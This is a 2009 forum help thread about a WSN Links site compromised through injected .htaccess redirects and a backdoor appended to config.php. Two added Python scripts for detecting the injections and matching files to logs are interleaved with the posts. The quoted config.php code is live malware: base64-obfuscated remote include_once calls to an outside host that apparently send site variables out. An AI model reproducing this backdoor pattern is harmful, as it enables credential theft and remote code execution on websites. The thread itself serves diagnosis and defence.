
I've been hacked


finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 08, 2009 - 7:38 PM:

My links site has been hacked pretty heavily I feel.

Not to degrade the security of WSN, because I think it was through template files which were chmodded to 777.

I noticed some pretty peculiar activity in my raw access logs, calling for files that did not exist, and a name of "bdbjizzazbzeh" doing most of it.

A couple of days later there were derogatory text links added to my wrapper and main tpls. I managed to get rid of those, but after an in-depth look at some of the directories in Cpanel, these people had a blast in there.

In any directory with an htaccess, the htaccess file within points to a php file they have either created or rewritten. I'm not sure what files are WSN and what aren't anymore.

An example: the htaccess file inside the includes directory reads:

Options -MultiViews
ErrorDocument 404 //includes/commands.php



And the referring commands.php reads:

My config.php file has been hit as well, and now has the following at the bottom:

$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==")."bdbjizzazbzeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){}
else {include_once(base64_decode("aHR0cDovLw==")."bdbjizzazbzeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}
?>

I'm looking for advice at this point. Is it possible for me to download WSN links again and compare the directory structure and maybe delete the files they have created?

If I save the database and kill the rest, reinstall with the 5.0 series, will it fix me up?

Or can I overwrite with another install of my current version?
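A quick way to sweep a web root for the two patterns this post shows: an .htaccess whose ErrorDocument points at a .php file, and PHP that feeds base64_decode() into eval() or include_once(). This is an added example, not WSN code or anything posted in this thread; the directory tree it scans is constructed inside the script, and the auto_prepend_file check goes one step beyond what the post mentions.

```python
import base64
import os
import re
import tempfile
from pathlib import Path

# Signatures taken from the injected files shown in this thread, plus
# auto_prepend_file (not in the thread, but a common sibling of the trick).
HTACCESS_RULE = re.compile(
    r"^\s*(ErrorDocument\s+\d{3}\s+\S*\.php\b|php_value\s+auto_(?:prepend|append)_file\s+\S+)",
    re.I | re.M)
PHP_RULE = re.compile(
    r"\b(?:eval|include|include_once|require|require_once)\s*\(\s*base64_decode\s*\(", re.I)

def scan_file(path):
    """Return the matching directive/call if the file looks injected, else None."""
    text = path.read_text(errors="replace")
    rule = HTACCESS_RULE if path.name == ".htaccess" else PHP_RULE if path.suffix.lower() in (".php", ".tpl", ".inc") else None
    m = rule.search(text) if rule else None
    return m.group(0).strip() if m else None

def scan_tree(root):
    """Walk a web root; return sorted (relative path, reason) for suspicious files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            reason = scan_file(p)
            if reason:
                hits.append((p.relative_to(root).as_posix(), reason))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed sample: one injected directory next to a clean one."""
    inc = Path(root, "includes")
    inc.mkdir()
    inc.joinpath(".htaccess").write_text("Options -MultiViews\nErrorDocument 404 //includes/commands.php\n")
    payload = base64.b64encode(b'echo "constructed";').decode()  # harmless stand-in blob
    inc.joinpath("commands.php").write_text('<?php error_reporting(0); eval(base64_decode("%s")); ?>' % payload)
    tpl = Path(root, "templates")
    tpl.mkdir()
    tpl.joinpath(".htaccess").write_text("ErrorDocument 404 /404.html\n")
    tpl.joinpath("wrapper.tpl").write_text("<html><body>{content}</body></html>\n")

def demo():
    # Scan the constructed tree and return only the flagged relative paths.
    with tempfile.TemporaryDirectory() as d:
        build_sample_tree(d)
        return [p for p, _ in scan_tree(d)]

if __name__ == "__main__":
    print(demo())  # ['includes/.htaccess', 'includes/commands.php']
```

Point scan_tree() at a real document root to get the list of files worth diffing against a clean download.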
AutumnWindz
Member

Usergroup: Customer
Joined: Oct 01, 2004

Total Topics: 14
Total Comments: 46
Posted Apr 08, 2009 - 9:06 PM:

First, and I am sure you have heard this before, always have a clean copy of your site backed up offline so you can simply overwrite the files.

I don't know that they could get to your config file through your templates, though I could be wrong; this may have been a hack into your server.

You can get a clean copy of the files by going to the customer area and downloading the manual upgrade version to get all of the files - not the new install. If you run a new install it will empty your database - learned that one the hard way a few years back!

Can you tell by looking at the date/time of the file on your server to see which ones were changed?

Paul may have other suggestions, but if it were me I would overwrite all of the files with the new ones from the manual upgrade version if I didn't have a clean copy offline. If they got into your config file, you will need to recreate it somehow as it has your database information in it that is inserted during a new install.
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Posted Apr 09, 2009 - 8:24 PM:

777 chmods are not, in themselves, vulnerabilities. All they do is allow anyone who has already hacked you to write to those files in apache mode (in suPHP mode, the hacker can already write to all your files).

The only chance at finding out how they got in is the server traffic logs combined with checking the last modification date of the hacked file(s). If config.php was last modified on 4/5/2009 8:15am, for example, the apache log line for what was being accessed on 4/5/2009 at 8:15am will likely reveal how the attack was executed and allow me to prevent it from happening again. Or at least it'll be the start of the trail; sometimes there are several steps to get back to the original hack.

Talking about cleanup at this point is premature since the attack vector is still open; they'll just re-hack. You'll need to remove the injected material from the config.php and any templates, though. You can delete all files and use a new WSN install's files, replacing the config.php info with your current database.
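Paul's method of lining a hacked file's mtime up against the Apache access log, as an added example (not WSN's tooling or anything from this thread): the log lines and the 4/5/2009 8:15am mtime are constructed here to match his example, and the ordering of which request to read first is my own heuristic, built on the thread's observation that the attacker first probed for files that did not exist.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" log format; the referrer/user-agent pair is optional so
# "common" format lines parse too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>[^"]*)")?')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def file_mtime(path):
    """Last-modified time as a zone-aware datetime (UTC), so it compares
    correctly with log timestamps that carry their own offset."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)

def requests_near(log_lines, mtime, window=timedelta(minutes=5)):
    """Requests logged within +/- window of the file's modification time."""
    recs = (parse_line(line) for line in log_lines)
    return [r for r in recs if r and abs(r["ts"] - mtime) <= window]

def rank(recs):
    """Most suspicious first: a write usually rides on a POST, and 404s for
    files that do not exist (as in this thread) often precede it."""
    def score(r):
        return (r["method"] == "POST") * 2 + (r["status"] == "404") + ("?" in r["path"])
    return sorted(recs, key=lambda r: (-score(r), r["ts"]))

# Constructed sample: mtime from Paul's example, log lines made up to match.
MTIME = datetime(2009, 4, 5, 8, 15, 0, tzinfo=timezone(timedelta(hours=-7)))
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Apr/2009:08:02:11 -0700] "GET /index.php HTTP/1.1" 200 4820 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [05/Apr/2009:08:13:30 -0700] "GET /images/header.gif HTTP/1.1" 200 913 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [05/Apr/2009:08:14:40 -0700] "GET /includes/missing.php HTTP/1.1" 404 211 "-" "bdbjizzazbzeh"',
    '203.0.113.9 - - [05/Apr/2009:08:15:01 -0700] "POST /includes/commands.php HTTP/1.1" 200 35 "-" "bdbjizzazbzeh"',
    '198.51.100.7 - - [05/Apr/2009:08:40:05 -0700] "GET /index.php HTTP/1.1" 200 4820 "-" "Mozilla/4.0"',
]

def suspects(log_lines=SAMPLE_LOG, mtime=MTIME):
    """(ip, method, path) for requests near the mtime, most suspicious first."""
    return [(r["ip"], r["method"], r["path"]) for r in rank(requests_near(log_lines, mtime))]

if __name__ == "__main__":
    for s in suspects():
        print(*s)
```

On a real box, pass file_mtime("config.php") and the lines of the rotated log that covers that date; if the log starts after the mtime, as happened later in this thread, there is nothing to correlate.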
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 09, 2009 - 10:07 PM:

Thanks guys. I had several directories set at 777 also. I recall leaving them that way due to extensive editing and uploading.

Once I spent even more time looking around, it was actually kind of easy cleaning things up. They actually put the htaccess files in the chmodded directories and then set it to call their files in that directory. So following it all was fairly time consuming but not really difficult.

I also had a backup of the config file so removing their code was possible also.



Checking the server logs didn't do much good because I'm not sure how long it had been hacked. It was hacked, by the looks of things, way before the derogatory text links were added, which is what tipped me off.

After removing all added php files and the htaccess files directing to them, I fixed permissions on the directories and the config file, and everything seems to be back to normal. Also changed admin username and password.

I'll see how it goes, and if nothing else, I'll kill it and reinstall as Paul mentioned. I was hoping to do so as a last resort, since there have been major template alterations by me.
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Posted Apr 09, 2009 - 11:00 PM:

Checking the server logs didn't do much good because I'm not sure how long it had been hacked.

That's why you need to look at the file last modification time via FTP. That tells you when it was hacked. If you give me the server log and the last modification time of a hacked file -- and/or the creation time of the .htaccess files they inserted -- odds are I can trace it back.

I fixed permissions

777 permissions don't mean something is broken. The script is going to change a bunch of permissions back to 777 when it needs to anyhow.
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 11, 2009 - 12:08 AM:

The first hack according to "last modified date" is 1/23/09. I switched hosts and moved to Liquid Web on 3/23/09. And now I'm showing several more files hacked on 4/4/09.

The only apache logs I have are dated 4/8 and 4/10. Which one do you want, and how would you like it?
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Posted Apr 12, 2009 - 3:26 AM:

If the log doesn't contain the most recent 4/4/09 hack time, then it doesn't help. If you have cpanel, set it to archive the logs in the future so you'll have logs going back far enough next time.
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 20, 2009 - 6:59 PM:

Paul, as you expected, I'm still having trouble.

I'd like to move to the 5.0 series at this point, since I'm going to dump all my current files.

My question is can I use my current config file for the 5.0 series?

I don't care about any current templates, I can rebuild all that. My biggest concern is retaining my 284 links and the 263 members.
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Posted Apr 21, 2009 - 9:37 PM:

Run the new upgrade.php on the old config + database and it'll be upgraded.

Again though, none of this may help you until you check the last modified time of a hacked file and compare with the logs.
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 21, 2009 - 9:53 PM:

I know the last modified date of the hacked files; the problem is I don't have the logs to go with it. I've just installed SUexe on my server and closed what I believe could have been a few other security leaks, and I cut off log rotation so there are no gaps in the logs.

All I can really do that I know of at this point is move forward and hopefully, with my changes, be a little more prepared if it happens again.